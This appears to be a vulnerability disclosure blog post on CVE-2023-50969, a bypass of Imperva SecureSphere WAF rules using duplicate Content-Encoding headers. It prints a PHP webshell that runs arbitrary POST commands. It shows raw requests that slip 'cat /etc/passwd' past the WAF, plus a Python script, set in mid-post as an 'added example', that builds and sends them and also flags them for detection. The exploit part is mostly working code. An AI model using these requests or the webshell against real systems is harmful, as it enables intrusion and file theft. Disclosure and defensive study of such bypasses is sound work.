Wednesday, March 27, 2024

Bypassing Imperva SecureSphere WAF (CVE-2023-50969)

Background 

Imperva SecureSphere Web Application Firewall (WAF) is an on-premises security solution that inspects, monitors and blocks traffic to web applications.  Some versions of SecureSphere WAF are affected by a vulnerability that allows an attacker to bypass WAF rules that inspect POST data and subsequently exploit flaws in protected web applications that would otherwise be blocked.


Vulnerability Summary

CVE-2023-50969 – Imperva SecureSphere WAF Bypass for POST Data Inspection Rules

Impact: An attacker is able to bypass WAF rules that inspect POST data and would be able to successfully exploit existing vulnerabilities in protected applications that would otherwise be blocked.

Severity:  Critical (CVSS 3.1 Base Score: 9.8 / Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Affected versions: Tested on Imperva SecureSphere WAF v14.7.0.40; all versions of Imperva SecureSphere without the Application Defense Center (ADC) update referenced in the "Fixed Version(s)" section are vulnerable.  Imperva Cloud WAF is not affected.

Fixed Version(s):  Per Imperva, this issue can be remediated by an ADC rule update that was released on February 26, 2024.  Imperva customers may get more information by logging into the Imperva Support Portal and reviewing the following document: https://docs.imperva.com/bundle/z-kb-articles-km/page/f81a5705.html


Technical Details

To demonstrate the vulnerability, let’s assume that a protected application includes some vulnerable code.  In our case it’s a wildly insecure PHP webshell named clam.php:


<html>
<body>
<form method="POST" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="cmd" id="cmd" >
<input type="submit" value="Execute">
</form>
<pre>
<?php
    if(isset($_POST['cmd']))
    {
        system($_POST['cmd']);
    }
?>
</pre>
</body>
</html>


By design, this page will execute any system command passed in the cmd POST parameter.

Many commands, such as cat /etc/passwd, are blocked by standard WAF rules.  (The same applies to many other specific vulnerabilities and vulnerability classes, such as Cross-Site Scripting, SQL Injection, and more.)  For example:

POST /clam.php HTTP/1.1
Host: my.target.host
User-Agent: Mozilla/5.0 
Content-Type: application/x-www-form-urlencoded
Content-Length: 19

cmd=cat+/etc/passwd


As expected, this gets blocked by a standard WAF rule:



However, we can bypass the blocking WAF rule by sending a request with two (or more) specially crafted Content-Encoding headers.  (The Content-Encoding header lists the encodings that have been applied to the HTTP message body; the registered values include br, compress, deflate, and gzip.)

If we modify our request by adding a Content-Encoding header with an arbitrary value, followed by a Content-Encoding: gzip header, the responsible WAF rule no longer fires, even though the body is still the same plain (uncompressed) form data:


POST /clam.php HTTP/1.1
Host: my.target.host
User-Agent: Mozilla/5.0 
Content-Type: application/x-www-form-urlencoded
Content-Encoding: No Kill No Beep Beep
Content-Encoding: gzip
Content-Length: 19

cmd=cat+/etc/passwd



In addition to a gzip header value, we can also bypass WAF rules with an extra Content-Encoding header followed by a Content-Encoding: deflate header.  However, I’ve observed that in order to bypass some rules you may also need to add a throwaway POST parameter/value pair before the parameter/value pairs that would otherwise trigger a WAF rule.  So to successfully exploit our example above, we’d need to send a request like:


POST /clam.php HTTP/1.1
Host: my.target.host
User-Agent: Mozilla/5.0 
Content-Type: application/x-www-form-urlencoded
Content-Encoding: No Kill No Beep Beep
Content-Encoding: deflate
Content-Length: 29

qand=notu&cmd=cat+/etc/passwd
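Here is the same pair of requests assembled programmatically, as an added example that is not part of the original post and is not Imperva's code.  It builds the raw request bytes with the correct Content-Length (the body stays plain form data, exactly as above; the requests library keeps headers in a dict and cannot emit two with the same name, which is why the bytes are built by hand), can send them over a raw socket, and includes a small detection function showing the signals a WAF or reverse proxy could refuse on: more than one Content-Encoding header, an unregistered coding token, or a declared gzip/deflate body that does not actually decode.  The host, path and throwaway qand=notu parameter are the placeholders from the examples above; the added Connection: close header is only there so the raw-socket read terminates; KNOWN_CODINGS and the detection logic are suggestions for a defender, not a description of what Imperva's ADC update does.

```python
# Added example for this write-up (not code from the original post or from
# Imperva): builds the duplicate Content-Encoding requests shown above and
# checks a request for the signals a WAF could refuse it on. The host, path
# and throwaway 'qand=notu' parameter are the placeholders from the examples.
import socket
import zlib
from urllib.parse import urlencode

# Content codings a WAF or origin can be expected to recognise (IANA registry).
KNOWN_CODINGS = {"gzip", "x-gzip", "deflate", "br", "compress", "x-compress",
                 "identity", "zstd"}


def build_bypass_request(host, path, params, encoding="gzip", junk_param=None,
                         bogus_value="No Kill No Beep Beep"):
    """Raw HTTP/1.1 request bytes with a bogus Content-Encoding header followed
    by a real one (gzip or deflate). junk_param, if given, is a (name, value)
    pair placed before the real parameters, which some rules require.
    Content-Length is computed from the actual (uncompressed) body."""
    pairs = list(params)
    if junk_param is not None:
        pairs.insert(0, junk_param)
    body = urlencode(pairs, safe="/").encode()  # keep '/' readable, as in the post
    headers = [
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        "User-Agent: Mozilla/5.0",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Encoding: {bogus_value}",  # arbitrary token, not a real coding
        f"Content-Encoding: {encoding}",     # second header names a real coding
        f"Content-Length: {len(body)}",
        "Connection: close",                 # added so the raw-socket read ends
    ]
    return "\r\n".join(headers).encode() + b"\r\n\r\n" + body


def send_raw(host, port, request, timeout=10):
    """Send the raw request over plain TCP and return the response bytes.
    Only use this against a host you are authorised to test."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while data := sock.recv(65536):
            chunks.append(data)
    return b"".join(chunks)


def parse_request(raw):
    """Split raw request bytes into (request line, [(name, value), ...], body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def _decodes(body, coding):
    """True if body really is gzip or zlib-framed deflate data (the HTTP meaning)."""
    wbits = 16 + zlib.MAX_WBITS if coding in ("gzip", "x-gzip") else zlib.MAX_WBITS
    try:
        zlib.decompress(body, wbits)
        return True
    except zlib.error:
        return False


def content_encoding_findings(raw):
    """Reasons to refuse the request (empty list when it looks normal): more
    than one Content-Encoding header, an unregistered coding token, or a
    declared gzip/deflate coding whose body does not actually decode."""
    _, headers, body = parse_request(raw)
    codings = [v for n, v in headers if n == "content-encoding"]
    findings = []
    if len(codings) > 1:
        findings.append(f"multiple Content-Encoding headers: {codings}")
    for value in codings:
        for token in (t.strip().lower() for t in value.split(",")):  # one header may list several
            if token not in KNOWN_CODINGS:
                findings.append(f"unregistered content coding {token!r}")
    if codings:
        last = codings[-1].split(",")[-1].strip().lower()
        if last in ("gzip", "x-gzip", "deflate") and not _decodes(body, last):
            findings.append(f"body is not valid {last} data")
    return findings


if __name__ == "__main__":
    cmd = [("cmd", "cat /etc/passwd")]
    for req in (build_bypass_request("my.target.host", "/clam.php", cmd),
                build_bypass_request("my.target.host", "/clam.php", cmd,
                                     encoding="deflate", junk_param=("qand", "notu"))):
        print(req.decode("iso-8859-1"))
        print("findings:", content_encoding_findings(req), "\n")
    # To send one for real: send_raw("my.target.host", 80, req)
```

Running the script prints both crafted requests and the three findings each one triggers.  Against a SecureSphere without the ADC update, sending them with send_raw() to a test page like clam.php reproduces the bypass; after the update they should be blocked, which makes the script a convenient regression check.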


Remediation Recommendations

Per Imperva, this issue can be remediated by an ADC rule update that was released on February 26, 2024.  Imperva customers may get more information by logging into the Imperva Support Portal and reviewing the following document: https://docs.imperva.com/bundle/z-kb-articles-km/page/f81a5705.html  After the update has been applied, replaying the duplicate Content-Encoding requests above against a protected test page and confirming that they are blocked is a straightforward way to verify it.


Acknowledgments

I’d like to thank Imperva for their prompt response to this vulnerability and Carl Livitt for his previous security research on Imperva WAFs.


Timeline

2023-11-10 - Reported the vulnerability to Imperva.

2024-02-26 - ADC rule update to remediate the vulnerability available from Imperva.

2024-03-27 - Blog post published.

